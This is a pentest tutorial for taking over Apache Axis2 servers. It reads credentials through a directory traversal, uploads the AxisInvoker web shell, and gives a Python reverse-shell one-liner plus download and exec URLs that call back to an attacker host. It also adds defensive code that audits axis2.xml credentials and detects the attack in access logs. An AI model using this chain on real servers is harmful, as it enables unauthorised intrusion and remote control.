Disclaimer:
I do not condone or take responsibility for any illegal use of this tutorial. Please only target hosts you have permission to test.
Prerequisites
For this exploit to work you must have:
- Valid admin console credentials
  - Default: admin:axis2
- Public access to the admin console
  - https://victim.com/axis2/axis2-admin
Discovery
There are a few ways to find credentials for Axis2 servers: default credentials, weak credentials that can be brute-forced, or outdated Axis2 servers. Here we use a vulnerability in Apache Axis2 <= v1.4.1 to recover the credentials. It is a directory traversal that gives read access to the configuration file (conf/axis2.xml), which stores the admin username and password in clear text. It can be discovered using modules in Nmap and OpenVAS.
Nmap
$ nmap -p<port> --script http-axis2-dir-traversal <ip>
|_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2
OpenVAS
FYI
- There is a Metasploit module at "exploit/multi/http/axis2_deployer" that will attempt to "Autopwn" the server.
- The code can be found on GitHub.
- I have tried this exploit multiple times with no success.
Manual Validation
- Navigating to https://victim.com/axis2/services/Version?xsd=../conf/axis2.xml will return the configuration file, which contains the credentials. They should look like this:
  <parameter name="userName">admin</parameter>
  <parameter name="password">axis2</parameter>
- When you navigate to https://victim.com/axis2/axis2-admin/ it should give you the login portal.
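Because the traversal simply hands out whatever is in conf/axis2.xml, the fix on the defending side is to make sure that file never contains the shipped admin:axis2 pair in the first place. The following is an added example, not part of the original write-up or of Axis2 itself: an offline audit a server owner can run against their own axis2.xml. The userName/password parameter names come from the file contents shown above; the XML excerpts and the replacement credentials are constructed samples, and the 12-character minimum is an assumed policy value.

```python
import xml.etree.ElementTree as ET

# Constructed excerpt of an Axis2 conf/axis2.xml with the default admin
# credentials still in place (the real file has many more parameters).
DEFAULT_AXIS2_XML = """
<axisconfig name="AxisJava2.0">
    <parameter name="hotdeployment">true</parameter>
    <parameter name="userName">admin</parameter>
    <parameter name="password">axis2</parameter>
    <transportReceiver name="http">
        <parameter name="port">8080</parameter>
    </transportReceiver>
</axisconfig>
"""

# The same excerpt after the credentials were changed (constructed values).
HARDENED_AXIS2_XML = DEFAULT_AXIS2_XML.replace(
    '<parameter name="userName">admin</parameter>',
    '<parameter name="userName">axis2-operator</parameter>',
).replace(
    '<parameter name="password">axis2</parameter>',
    '<parameter name="password">Zq7-rm2P-9vKx4Lt-ws</parameter>',
)

# Axis2 ships with admin:axis2; any deployment still using it is wide open.
DEFAULT_CREDENTIALS = {("admin", "axis2")}


def extract_admin_credentials(xml_text):
    """Return (userName, password) from the top-level <parameter> elements.

    Only direct children of <axisconfig> are considered: nested <parameter>
    elements (transports, modules) carry unrelated settings such as ports.
    """
    root = ET.fromstring(xml_text)
    params = {p.get("name"): (p.text or "").strip() for p in root.findall("parameter")}
    return params.get("userName"), params.get("password")


def audit_admin_credentials(xml_text, min_length=12):
    """Return a list of finding tags; an empty list means nothing was flagged."""
    user, password = extract_admin_credentials(xml_text)
    if not user or not password:
        # With no credentials configured the console cannot be protected at all.
        return ["missing-credentials"]
    findings = []
    if (user, password) in DEFAULT_CREDENTIALS:
        findings.append("default-credentials")
    if len(password) < min_length:  # assumed minimum length policy
        findings.append("short-password")
    if password.lower() == user.lower():
        findings.append("password-equals-username")
    return findings


if __name__ == "__main__":
    for label, xml_text in (("default", DEFAULT_AXIS2_XML), ("hardened", HARDENED_AXIS2_XML)):
        print(label, audit_admin_credentials(xml_text) or ["ok"])
```

Run it against the real file with `audit_admin_credentials(open("conf/axis2.xml").read())`; anything other than an empty list is worth fixing before the console is reachable from anywhere. Changing the password does not close the traversal on vulnerable versions, so the file contents still need to be treated as readable until Axis2 is upgraded.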
Create the Payload
A simple Axis2 webshell can be found at https://github.com/CaledoniaProject/AxisInvoker
- Download the file
- Compile the file
  - Modify $JAVA_HOME if necessary
  - Run "ant -v" to build
Exploit
- Upload the AxisInvoker.aar service.
- Verify the deployment by checking the Deactivate or Activate service tab.
- Verify the shell works by running https://victim.com/axis2/services/AxisInvoker/exec?cmd=id
- Since a stable interactive shell is more useful than a web shell, we will upgrade to one. You will need to find which languages are available on the system, or use a native option (like nc).
- Get a reverse shell and modify it to call back to your host machine, for example this Python one-liner (the shell.py used below):
  import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<AttackerIP>",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
  - I usually get most of my shells from PentestMonkey
- Download your reverse shell from your webserver to the victim machine.
  - https://victim.com/axis2/services/AxisInvoker/download?url=http://<AttackerIP>/shell.py&file=shell.py
- Listen for the reverse shell by running "nc -nlvp 443".
- Execute your shell on the victim machine.
  - https://victim.com/axis2/services/AxisInvoker/exec?cmd=python%20shell.py
- After a few seconds, you should have a shell on your listener!
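Every step of the chain above (the xsd=../ traversal, the admin console login and upload, and the exec/download calls to the deployed service) leaves a request in the web server's access log, which makes it straightforward to spot after the fact or to alert on. The following is an added example and not part of the original post or of any Axis2 tooling: a small detector run over constructed common/combined-format log lines. The URLs mirror the ones used in the walkthrough; 203.0.113.10 and 198.51.100.4 are constructed documentation-range addresses, and the `/axis2/axis2-admin/upload` path and the reason tags are assumptions of this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access log lines. 203.0.113.10 plays the host running the steps
# from the tutorial; 198.51.100.4 is ordinary SOAP traffic that must not fire.
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /axis2/services/Version?xsd=../conf/axis2.xml HTTP/1.1" 200 4123 "-" "curl/7.88.1"
203.0.113.10 - - [10/Oct/2023:13:55:40 +0000] "GET /axis2/services/Version?xsd=..%2F..%2Fconf%2Faxis2.xml HTTP/1.1" 200 4123 "-" "curl/7.88.1"
203.0.113.10 - - [10/Oct/2023:13:57:02 +0000] "GET /axis2/axis2-admin/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:58:15 +0000] "POST /axis2/axis2-admin/upload HTTP/1.1" 200 1870 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:59:01 +0000] "GET /axis2/services/AxisInvoker/exec?cmd=id HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:59:30 +0000] "GET /axis2/services/AxisInvoker/download?url=http://203.0.113.10/shell.py&file=shell.py HTTP/1.1" 200 98 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:14:00:12 +0000] "POST /axis2/services/Version HTTP/1.1" 200 540 "-" "Axis2"
198.51.100.4 - - [10/Oct/2023:14:00:13 +0000] "GET /axis2/services/Version/getVersion HTTP/1.1" 200 540 "-" "Axis2"
"""

# Common/combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# A deployed service exposing an operation named exec or download that takes a
# cmd= or url= argument is behaving like a web shell (as AxisInvoker does).
WEBSHELL_RE = re.compile(r"^/axis2/services/[^/]+/(exec|download)$", re.IGNORECASE)


def classify_request(target):
    """Return the list of reason tags that apply to one request target."""
    parts = urlsplit(target)
    # Decode the path and each query value a second time so that %2e%2e and
    # %252e%252e both end up as '..' before the checks run.
    path = unquote(unquote(parts.path))
    query = parse_qs(parts.query, keep_blank_values=True)
    values = [unquote(v) for vals in query.values() for v in vals]

    reasons = []
    if not path.lower().startswith("/axis2/"):
        return reasons
    if ".." in path or any(".." in v for v in values):
        reasons.append("traversal")       # e.g. the xsd=../conf/axis2.xml read
    if path.lower().startswith("/axis2/axis2-admin"):
        reasons.append("admin-console")   # console should not be reachable from outside
    if WEBSHELL_RE.match(path) and ({"cmd", "url"} & query.keys()):
        reasons.append("webshell")        # exec?cmd= / download?url= style calls
    return reasons


def scan_access_log(text):
    """Return one finding dict per log line that trips at least one check."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in common/combined format: skip rather than guess
        reasons = classify_request(m.group("target"))
        if reasons:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "target": m.group("target"), "reasons": reasons})
    return findings


def suspicious_sources(findings):
    """Group reason tags by client IP so a full chain from one host stands out."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).update(f["reasons"])
    return by_ip


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_ACCESS_LOG)
    for f in hits:
        print(f["ip"], f["ts"], ",".join(f["reasons"]), f["target"])
    print(suspicious_sources(hits))
```

A single source that collects all three tags in a short window is the whole tutorial replayed against you, and the "admin-console" tag alone is a configuration problem regardless of who sent it: the prerequisites section only works because the console is exposed, so restricting it to an internal network or removing it from production deployments takes the rest of the chain with it.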
Hope that helps in your future pentests!